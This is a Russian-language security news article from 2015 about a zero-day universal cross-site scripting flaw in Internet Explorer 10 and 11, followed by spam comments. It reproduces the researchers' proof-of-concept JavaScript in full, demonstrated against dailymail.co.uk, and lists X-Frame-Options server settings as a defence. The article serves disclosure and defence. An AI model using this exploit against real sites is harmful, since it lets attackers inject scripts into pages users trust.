XSS-уязвимость нулевого дня в Internet Explorer позволяет атаковать любые сайты Вчера стало известно о появлении ранее неизвестной уязвимости межсайтового скриптинга в Microsoft Internet Explorer. Используя эту ошибку, удаленный пользователь может внедрить в HTML-страницу произвольный JavaScript-сценарий в обход политики единства происхождения практически на любом сайте. Исследователи из deusen.co.uk, разместившие PoC-код эксплойта, продемонстрировали эксплуатацию уязвимости на сайте первой по величине тиража ежедневной газеты Великобритании «Daily Mail» www.dailymail.co.uk. При нажатии на специально сформированную ссылку пользователь перенаправляется на сайт dailymail.co.uk, после чего ему выводится сообщение «Hacked by Deusen». Сам код эксплойта выглядит следующим образом: function go() { w=window.frames[0]; w.setTimeout("alert(eval(`x=top.frames[1];r=confirm(`Close this window after 3 seconds...`);x.location=`javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwi ndow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20l eft%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dye s%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript %3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22`;`))",1); } setTimeout("go()",1000); Уязвимость присутствует в Internet Explorer 10.x и 11.x. Подробное описание уязвимости доступно по адресу: http://www.securitylab.ru/vulnerability/470863.php. Эксперты Positive Technologies отмечают, что в сети уже появилось несколько примеров использования уязвимости, из которых видно, что под угрозой находятся множество сайтов, включая критических ресурсы. В качестве эксперимента демонстрация атаки на портале международного форума по практической безопасности PHDays V: http://www.youtube.com/watch?v=R1n1aG-LNMg. Способы защиты Необходимо запретить сторонние iframe с помощью опции заголовка X-Frame-Options, отправляемого web-сервером. Для Apache настройка в .htaccess будет выглядеть так: Header always append X-Frame-Options SAMEORIGIN Для nginx: add_header X-Frame-Options SAMEORIGIN; При отсутствии возможности оперативной настройки серверов защититься можно с помощью решений класса Web Application Firewall (в качестве примера — настройки PT Application Firewall). Стоит отметить, что в последнее время участились 0day в инфраструктурных компонентах — Shellshock, ghost и др. Подливает масла в огонь и корпорация Google, раскрывая подробности о брешах в Windows несмотря на призывы Microsoft к более гибкой системе раскрытия уязвимостей. Похоже, что привычный в среде исследователей подход «узнал, помог закрыть уязвимость, опубликовал подробности» уже не работает.z Раздел: Информационная безопасность Дата: 06-02-2015 КОММЕНТАРИИ Life is short, and this article saved valubale time on this Earth. http://dqlpsijljwn.com [url=http://nnztjo.com]nnztjo[/url] [link=http://ccxensilvq.com]ccxensilvq[/link] Автор: Jenn Дата: 2016-08-09 14:00:35 Super inimroatfve writing; keep it up. http://pwrqbzb.com [url=http://zvycayz.com]zvycayz[/url] [link=http://mudtjpuwh.com]mudtjpuwh[/link] Автор: Raynoch Дата: 2016-08-07 07:36:19 I think I replied on the group messages, but it may or may not show up! I don’t want you to think this is a drag for me. I’m willing to be unrtmfocoable and I usually am uncomfortable when I’m learning something new or participating in something new. But I also think that people grow old and bored in order to avoid being uncomfortable – so uncomfortable is okay with me. Автор: Eloise Дата: 2016-08-06 05:53:13 |
№8 - 2013
В октябрьском номере журнала "Безопасность: Информационное обозрение" мы рассмотрели такие важные вопросы, как правила построения кадровой и информационной безопасности компании, выявление рисков корпоративного мошенничества и подбор частного охранного предприятия.
|